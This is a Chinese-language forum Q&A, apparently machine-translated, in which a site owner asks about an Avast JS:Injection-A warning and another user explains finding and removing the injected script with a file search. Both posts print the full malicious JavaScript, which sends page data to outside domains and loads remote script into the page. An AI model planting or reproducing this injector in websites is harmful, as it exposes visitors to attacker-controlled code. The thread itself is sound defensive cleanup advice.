Question

今天，当我想进入我的网站时，我收到了Avast的警告： forumhan.com。

要了解这一点，您必须在计算机上安装Avast。

我的网站感染了JS：Injection-A [Trj] - 这就是它没有显示的原因。

当我看，我在标题上发现了这个：

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://vkza.tora.ru/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

由于我不是专业人士，我无法理解是否与其他文件存在任何关系。

此代码中是否有对其他文件的调用？

删除它是否解决了问题？

我删除了它，但我看不到我的网页。

Answer 1

我找到了解决方案。

问题在于你说的是什么。有人将该代码注入您的网站（也是我的网站）。所以我所做的就是选择这个片段：

encodeURIComponent(document.title)

并在服务器上使用Notepad ++搜索所有文件中的 htdocs 文件夹。

然后我发现了这样的事情：

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://delicefilm.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

在这里：

我已经从所有文件中删除了它。这就是全部！

希望它也适合你！：）

Avast在我的网站上给出了JS：Injection-A [Trj]的错误

1 个答案: